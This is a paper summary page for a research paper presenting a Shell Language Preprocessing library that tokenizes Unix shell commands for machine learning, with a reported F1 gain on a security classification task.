Shell Language Processing: Unix command parsing for Machine Learning
Dmitrijs Trizna

TL;DR
This paper introduces a Shell Language Preprocessing library designed for parsing Unix commands, demonstrating significant improvements over traditional NLP methods in security classification tasks.
Contribution
The paper presents a novel tokenization and encoding approach tailored for shell commands, addressing limitations of conventional NLP pipelines.
Findings
F1 score improved from 0.392 to 0.874 in security classification
Method outperforms standard ICT tokenization techniques
Highlights the need for specialized preprocessing in shell command analysis
Abstract
In this article, we present a Shell Language Preprocessing (SLP) library, which implements tokenization and encoding directed at parsing Unix and Linux shell commands. We describe the rationale behind the need for a new approach with specific examples of when conventional Natural Language Processing (NLP) pipelines fail. Furthermore, we evaluate our methodology on a security classification task against widely accepted information and communications technology (ICT) tokenization techniques and achieve significant improvement of an F1 score from 0.392 to 0.874.
Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Code & Models
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.
Taxonomy
TopicsAdvanced Malware Detection Techniques · Software Engineering Research · Security and Verification in Computing
